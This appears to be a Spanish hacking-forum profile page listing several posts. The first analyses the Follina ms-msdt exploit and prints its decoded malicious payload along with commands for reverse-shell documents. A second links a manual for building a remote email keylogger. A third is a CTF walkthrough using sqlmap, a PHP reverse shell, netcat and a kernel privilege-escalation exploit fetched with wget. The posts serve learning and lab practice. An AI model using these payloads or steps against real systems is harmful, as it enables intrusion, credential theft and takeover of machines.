    Algo muy importante de esta vulnerabilidad es que no es necesario habilitar los MACROS para que el malware sea ejecutado.



    ms-msdt es una herramienta de soporte que recopila información para posteriormente ser enviada y analizada por los técnicos de Microsoft. Esta herramienta permite descargar la información  de una URL ofuscada en base64 y si nos ponemos a observar detalladamente la imagen, vemos que intenta descargar mpsigstub.exe que también es desarrollado por Microsoft para extraer los archivos  de actualización en un directorio temporal.

    El investigador subió la muestra a ANY-RUN, es decir, es un sandbox en línea para analizar la muestra de la ejecución del malware en tiempo real.



    - https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/



    URL ofuscada a base64:
    Código: Text
    1.  'JGNtZCA9ICJjOlx3aW5kb3dzXHN5c3RlbTMyXGNtZC5leGUiO1N0YXJ0LVByb2Nlc3MgJGNtZCAtd2luZG93c3R5bGUgaGlkZGVuIC1Bcmd1bWVudExpc3QgIi9jIHRhc2traWxsIC9mIC9pbSBtc2R0LmV4ZSI7U3RhcnQtUHJvY2VzcyAkY21kIC13aW5kb3dzdHlsZSBoaWRkZW4gLUFyZ3VtZW50TGlzdCAiL2MgY2QgQzpcdXNlcnNccHVibGljXCYmZm9yIC9yICV0ZW1wJSAlaSBpbiAoMDUtMjAyMi0wNDM4LnJhcikgZG8gY29weSAlaSAxLnJhciAveSYmZmluZHN0ciBUVk5EUmdBQUFBIDEucmFyPjEudCYmY2VydHV0aWwgLWRlY29kZSAxLnQgMS5jICYmZXhwYW5kIDEuYyAtRjoqIC4mJnJnYi5leGUiOw=='
    2.  

    Código decode base64 Python3:
    Código: Python
    1. import base64
    2.  
    3. base64_message = 'JGNtZCA9ICJjOlx3aW5kb3dzXHN5c3RlbTMyXGNtZC5leGUiO1N0YXJ0LVByb2Nlc3MgJGNtZCAtd2luZG93c3R5bGUgaGlkZGVuIC1Bcmd1bWVudExpc3QgIi9jIHRhc2traWxsIC9mIC9pbSBtc2R0LmV4ZSI7U3RhcnQtUHJvY2VzcyAkY21kIC13aW5kb3dzdHlsZSBoaWRkZW4gLUFyZ3VtZW50TGlzdCAiL2MgY2QgQzpcdXNlcnNccHVibGljXCYmZm9yIC9yICV0ZW1wJSAlaSBpbiAoMDUtMjAyMi0wNDM4LnJhcikgZG8gY29weSAlaSAxLnJhciAveSYmZmluZHN0ciBUVk5EUmdBQUFBIDEucmFyPjEudCYmY2VydHV0aWwgLWRlY29kZSAxLnQgMS5jICYmZXhwYW5kIDEuYyAtRjoqIC4mJnJnYi5leGUiOw=='
    4. base64_bytes = base64_message.encode('ascii')
    5. message_bytes = base64.b64decode(base64_bytes)
    6. message = message_bytes.decode('ascii')
    7.  
    8. print(message)
    9.  

    Con bash también es posible decodificarlo:
    Código: Text
    1. echo 'JGNtZCA9ICJjOlx3aW5kb3dzXHN5c3RlbTMyXGNtZC5leGUiO1N0YXJ0LVByb2Nlc3MgJGNtZCAtd2luZG93c3R5bGUgaGlkZGVuIC1Bcmd1bWVudExpc3QgIi9jIHRhc2traWxsIC9mIC9pbSBtc2R0LmV4ZSI7U3RhcnQtUHJvY2VzcyAkY21kIC13aW5kb3dzdHlsZSBoaWRkZW4gLUFyZ3VtZW50TGlzdCAiL2MgY2QgQzpcdXNlcnNccHVibGljXCYmZm9yIC9yICV0ZW1wJSAlaSBpbiAoMDUtMjAyMi0wNDM4LnJhcikgZG8gY29weSAlaSAxLnJhciAveSYmZmluZHN0ciBUVk5EUmdBQUFBIDEucmFyPjEudCYmY2VydHV0aWwgLWRlY29kZSAxLnQgMS5jICYmZXhwYW5kIDEuYyAtRjoqIC4mJnJnYi5leGUiOw==' | base64 --decode
    2.  



    DECODE:
    Código: Text
    1. $cmd = "c:\windows\system32\cmd.exe";Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe";Start-Process $cmd -windowstyle hidden -ArgumentList "/c cd C:\users\public\&&for /r %temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";
    2.  

    Nos damos una idea de que utiliza el CMD (Comando de la terminal) para ejecutar un comando e iniciar un proceso "oculto", luego mata el proceso msdt.exe (taskkill), seguidamente ejecuta otro proceso y descarga un archivo .RAR (05-2022-0438.rar) para guardarlo dentro de una variable que contenga un string específico por medio del certutil ya que este es una de la técnicas más conocidas para ejecutar malware porque permite instalar, realizar copias de seguridad y administrar certificados de Windows. Finalmente expande el archivo y tratará de ejecutar rgb.exe.

    Microsoft entrego una guía para poder deshabilitar el protocolo de URL para que ms-msdt no pueda descargar archivos desde el exterior. Es IMPORTANTE aclarar que no se trata de un parche, sino que de un Workarounds (soluciones alternativas), la vulnerabilidad zero-day aún no tiene un parche oficial y sigue siendo explotada.

    - https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/

    En github ya se han publicado varios códigos para replicar la vulnerabilidad "Follina" de forma local, como por ejemplo:

    - https://github.com/chvancooten/follina.py
    - https://github.com/JohnHammond/msdt-follina

    Para poder hacer uso de él debemos clonarlo y luego especificar párametros. Para ejecutar un binario local:
    Código: Text
    1. python .\follina.py -t docx -m binary -b \windows\system32\calc.exe
    2.  

    Se genera un archivo "clickme.docx" que dentro contiene un payload que sera iniciado en el servidor web (http://localhost:80/exploit.html).



    Obtener una reverse shell:
    Código: Text
    1. git clone https://github.com/JohnHammond/msdt-follina
    2. cd msdt-follina
    3. python3 follina.py
    4. python3 follina.py --reverse 443 --interface wlan0 --output doc_malicioso.doc
    5.  



    Luego se inicia un servidor local para ser descargado y ejecutado en la máquina Windows:
    Código: Text
    1. python3 -m http.server 8080
    2. o
    3. sudo service apache2 start
    4.  





    #R3LI4NT

    13
    Manuales y revistas / [Manual] Keylogger con Python3
    « en: Junio 09, 2022, 03:24:11 am »
    Que tal gente de HxC!

    Les comparto un manual escrito por un compañero cuyo nick es ZZKLLX en el cual explica como crear un keylogger remoto (envío por email) desde cero con lenguaje Python. En el manual se explica detalladamente el bloque de código y su respectiva función. El código se encuentra alojado en su perfil de github junto con la revista.

    Keylogger con Python



    Descargar

    MEGA: https://mega.nz/file/7nwEQazb#Fjdg3I05eUElXelelsj2u5XYiWzcCcMGk7SNOIwa3t4
    Mediafire: https://www.mediafire.com/file/1u81mgt2gje03fo/KEYLOGGER_CON_PYTHON.pdf/file
    Leer online: https://www.yumpu.com/es/document/view/66966323/keylogger-con-python
    Perfil de Github: https://github.com/ZZKLLX

    14
    Hacking / CTF - Hackademic_RTB1 [RESUELTO]
    « en: Junio 03, 2022, 10:13:58 pm »
    Hola nuevamente comunidad HxC!

    Vengo a compartirles otro reto de captura la bandera para que vayan practicando. Creé un nuevo repositorio en mi perfil de Github donde estaré subiendo máquinas resueltas, por el momento solo subí una (la que compartiré aquí) pero iré actualizando con nuevos entornos virtuales y dificultad de la misma.

    GITHUB: https://github.com/R3LI4NT/ctf-retos

    Máquina: Hackademic_RTB1
    Nivel: Fácil
    O.S: Linux

    Descargar máquina desde vulnhub: https://www.vulnhub.com/entry/hackademic-rtb1,17/
    Root-me: https://www.root-me.org/fr/Capture-The-Flag/CTF-all-the-day/Hackademic-RTB1-22?lang=es

    Paso 1: Identificación de la máquina en la red con NetDiscover.
    Código: Text
    1. netdiscover --interface wlan0 --range 192.168.1.0/24
    2.  



    Objetivo: 192.168.1.5

    Paso 2: Escaneo de puertos abiertos con Nmap.
    Código: Text
    1. nmap -p- --open -sC -n -vvv 192.168.1.5
    2.  



    Detección de sistema operativo y versión:
    Código: Text
    1. nmap -p 80 -A 192.168.1.5
    2.  



    Puerto abierto: 80
    Servidor web corriendo: HTTP Apache

    Paso 3: Búsqueda de vectores vulnerables a SQL.
    Código: Text
    1. http://192.168.1.5/Hackademic_RTB1/?cat=1
    2.  



    Paso 4: Inyección de SQL a base de datos con Sqlmap.
    Código: Text
    1. sqlmap --url 'http://192.168.1.5/Hackademic_RTB1/?cat=1' --dbs --batch
    2.  



    Extraer toda la información de la base de datos de WordPress:
    Código: Text
    1. sqlmap --url 'http://192.168.1.5/Hackademic_RTB1/?cat=1' -D wordpress --dump-all --batch
    2.  



    Usuario de WordPress: GeorgeMiller
    Contraseña: q1w2e3

    Acceder al panel de login de WordPress:
    Código: Text
    1. http://192.168.1.5/Hackademic_RTB1/wp-login.php
    2.  



    Paso 5: Subir código PHP y obtener una reverse shell.

    -> Manage -> Files



    Copiar código PHP de la siguiente ruta:
    Código: Text
    1. cat /usr/share/webshells/php/php-reverse-shell.php
    2.  



    Pegan el código en hello.php y cambian la línea de $ip por su IP local, luego guardan los cambios "Update File":



    Abren una nueva terminal y ejecutan Netcat para que escuche las conexiones por el puerto 1234:
    Código: Text
    1. nc -lvp 1234
    2.  

    Posteriormente recargan la siguiente URL:
    Código: Text
    1. http://192.168.1.5/Hackademic_RTB1/wp-content/plugins/hello.php
    2.  



    Paso 6: Identificar versión del Kernel y escalar privilegios.



    Localizar el exploit con searchsploit:
    Código: Text
    1. searchsploit Linux Kernel 2.6.3 RDS Local Privilege Escalation
    2.  



    Descargar el exploit:
    Código: Text
    1. searchsploit -m 15285
    2.  



    Ejecutamos un servidor HTTP local simple con Python:
    Código: Text
    1. python3 -m http.server 80
    2.  



    Dentro de la reverse shell generada, nos movemos al directorio /tmp y descargamos el exploit de nuestro servidor:
    Código: Text
    1. cd /tmp
    2. wget http://192.168.1.9/15285.c
    3.  



    Seguidamente compilamos el código y le damos permisos de lectura, escritura y ejecución:
    Código: Text
    1. gcc 15285.c -o kernel
    2. chmod 777 kernel
    3.  



    Por último, ejecutan el comando de ./kernel y comenzará a explotar la vulnerabilidad:



    Y es así como finalmente obtendremos permisos de administrador (root) en la máquina víctima:



    #R3LI4NT

    15
    Hacking / Re:duda herramientas goldeneye y slowloris
    « en: Junio 02, 2022, 10:54:38 pm »
    Prueba el script de Slowloris Check de Nmap para comprobar si el puerto 80 es vulnerable a este ataque.

    - https://nmap.org/nsedoc/scripts/http-slowloris-check.html

    Para utilizarlo usas el siguiente comando:
    nmap -p 80 --script http-slowloris-check "IP"

    Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ... 22
    • SMF | SMF © 2013, Simple Machines
    • XHTML
    • RSS
    • WAP2
    Va un mudo y le dice a un sordo: Hack x Crack usa cookies. Pues eso... Learn more